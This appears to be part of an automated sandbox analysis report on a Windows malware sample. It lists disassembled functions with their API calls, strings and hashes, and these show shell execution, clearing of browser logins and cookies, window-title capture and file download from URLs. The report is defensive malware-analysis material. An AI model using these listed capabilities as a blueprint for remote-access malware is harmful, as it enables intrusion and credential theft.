                                • API ID: ExecuteShell
                                • String ID: /C $cmd.exe$open
                                • API String ID: 587946157-3896048727
                                • Opcode ID: 4ad490e0fde3b647c583a86c80413934cd69158f8dfa8dfee57c8354f6faf088
                                • Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
                                • Opcode Fuzzy Hash: 4ad490e0fde3b647c583a86c80413934cd69158f8dfa8dfee57c8354f6faf088
                                • Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044A004 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: __alldvrm$_strrchr
                                • String ID:
                                • API String ID: 1036877536-0
                                • Opcode ID: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                                • Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
                                • Opcode Fuzzy Hash: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                                • Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00442801 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                • Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
                                • Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                • Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040C00C Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
                                • Cleared browsers logins and cookies., xrefs: 0040C0F5
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep
                                • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                • API String ID: 3472027048-1236744412
                                • Opcode ID: 124cb6de9c263eed82a237a43c98a4d15d006963f6995f73d2f5d0000a7b7099
                                • Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
                                • Opcode Fuzzy Hash: 124cb6de9c263eed82a237a43c98a4d15d006963f6995f73d2f5d0000a7b7099
                                • Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040A529 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0041C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C561
                                  • Part of subcall function 0041C551: GetWindowTextLengthW.USER32(00000000), ref: 0041C56A
                                  • Part of subcall function 0041C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C594
                                • Sleep.KERNEL32(000001F4), ref: 0040A573
                                • Sleep.KERNEL32(00000064), ref: 0040A5FD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$SleepText$ForegroundLength
                                • String ID: [ $ ]
                                • API String ID: 3309952895-93608704
                                • Opcode ID: 31279ddc9ac779b407beafc78fb4a7c612abc736342ec11431a77cc1334fcb89
                                • Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
                                • Opcode Fuzzy Hash: 31279ddc9ac779b407beafc78fb4a7c612abc736342ec11431a77cc1334fcb89
                                • Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00443A33 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                                • Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
                                • Opcode Fuzzy Hash: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                                • Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00448566 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
                                • GetLastError.KERNEL32(?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad$ErrorLast
                                • String ID:
                                • API String ID: 3177248105-0
                                • Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                • Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
                                • Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                • Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041C485 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C4B2
                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041C4D7
                                • CloseHandle.KERNEL32(00000000), ref: 0041C4E5
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleReadSize
                                • String ID:
                                • API String ID: 3919263394-0
                                • Opcode ID: b5e3200c466b265101f42b470097a5df982af49012dad84e5cfda8818ecad7ff
                                • Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
                                • Opcode Fuzzy Hash: b5e3200c466b265101f42b470097a5df982af49012dad84e5cfda8818ecad7ff
                                • Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00439863 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                                  • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
                                • _UnwindNestedFrames.LIBCMT ref: 00439891
                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
                                • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                • String ID:
                                • API String ID: 2633735394-0
                                • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                • Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
                                • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                • Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004193E3 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                Download Yara Rule
                                APIs
                                • GetSystemMetrics.USER32(0000004C), ref: 004193F0
                                • GetSystemMetrics.USER32(0000004D), ref: 004193F6
                                • GetSystemMetrics.USER32(0000004E), ref: 004193FC
                                • GetSystemMetrics.USER32(0000004F), ref: 00419402
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: MetricsSystem
                                • String ID:
                                • API String ID: 4116985748-0
                                • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                • Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
                                • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                • Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00438F31 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                Download Yara Rule
                                APIs
                                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
                                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
                                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B
                                  • Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B
                                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                • String ID:
                                • API String ID: 1761009282-0
                                • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                • Instruction ID: 04dbcd9d80b8837b95b31ffc0e846904d80335f120ca5f78e3accc67d081205e
                                • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                • Instruction Fuzzy Hash: 59C04C15080781541C50B6B2210B2AE83461E7E38DFD074DFFCE0571038E4E043B653F
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00442C5D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                Download Yara Rule
                                APIs
                                • __startOneArgErrorHandling.LIBCMT ref: 00442CED
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorHandling__start
                                • String ID: pow
                                • API String ID: 3213639722-2276729525
                                • Opcode ID: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                                • Instruction ID: c2a334fe3ab53b67a82bc2a1da04863f7f1ed5e2a579c87dfbcc8ae8a095d349
                                • Opcode Fuzzy Hash: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                                • Instruction Fuzzy Hash: C6516DA1E0420296FB167B14CE4137B2BA4DB40751F704D7FF096823AAEB7D8C859A4F
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00451B37 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ACP$OCP
                                • API String ID: 0-711371036
                                • Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                • Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
                                • Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                • Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00418B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                Download Yara Rule
                                APIs
                                • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418BAA
                                  • Part of subcall function 00418656: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A
                                • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00418BCF
                                  • Part of subcall function 004186CB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD
                                  • Part of subcall function 00418679: GdipDisposeImage.GDIPLUS(?,00418B82), ref: 00418682
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                • String ID: image/png
                                • API String ID: 1291196975-2966254431
                                • Opcode ID: d4f259a593197f1d9dbe7f79535cfb99d89987488e7eb69950e532603a38181c
                                • Instruction ID: c6f894421d6f6d4ca6915e56eba1d7ff3797fde04a376feef2065c2e579c4a83
                                • Opcode Fuzzy Hash: d4f259a593197f1d9dbe7f79535cfb99d89987488e7eb69950e532603a38181c
                                • Instruction Fuzzy Hash: 30219371204211AFC705EB61CC88CBFBBADEFCA754F10092EF54693161DB399945CBA6
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00449BF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                Download Yara Rule
                                APIs
                                • GetStdHandle.KERNEL32(000000F6), ref: 00449C3C
                                • GetFileType.KERNEL32(00000000), ref: 00449C4E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileHandleType
                                • String ID: =k
                                • API String ID: 3000768030-1421436146
                                • Opcode ID: b34b3b4b83b21344277d15047b5fba51ecc245e821c78927fd7bd009bf1ff183
                                • Instruction ID: 67a772f1b96ce562b336c628e562ce1c63ba93f9b2d947f4b03656f810f331b8
                                • Opcode Fuzzy Hash: b34b3b4b83b21344277d15047b5fba51ecc245e821c78927fd7bd009bf1ff183
                                • Instruction Fuzzy Hash: E61160315047524AE7304E3E8CC86677AD5AB56335B380B2FD5B6876F1C638DC82AA49
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00404FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                                Download Yara Rule
                                APIs
                                • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087
                                Strings
                                • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: LocalTime
                                • String ID: KeepAlive | Enabled | Timeout:
                                • API String ID: 481472006-1507639952
                                • Opcode ID: d7ff175fedf05b7445783633cdb62c4b571b838359eb1ad13fe403eca5861c2a
                                • Instruction ID: 59903f388a44bacb81d563bcbf5ab321eb0051b597eccb46fab67989b44e7fd4
                                • Opcode Fuzzy Hash: d7ff175fedf05b7445783633cdb62c4b571b838359eb1ad13fe403eca5861c2a
                                • Instruction Fuzzy Hash: 1D21F2719046405BD710B7259C0676F7B64E751308F40087EE8491B2A6DA7D5A88CBEF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0043C0F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID: =k
                                • API String ID: 269201875-1421436146
                                • Opcode ID: 84a0aec2fcd2e2198f060eb42423dc6b0e3e67b852f19c5b56d6cf535939c4c8
                                • Instruction ID: 33e0fe0941749f3336bda6be3c0f63978f5ebcf9e4adac19a04b7d23778c801b
                                • Opcode Fuzzy Hash: 84a0aec2fcd2e2198f060eb42423dc6b0e3e67b852f19c5b56d6cf535939c4c8
                                • Instruction Fuzzy Hash: A511D371A002104BEF209F39AC81B567294A714734F14162BF929EA2D5D6BCD8815F89
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041663B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON
                                Download Yara Rule
                                APIs
                                • Sleep.KERNEL32 ref: 00416640
                                • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
                                Strings
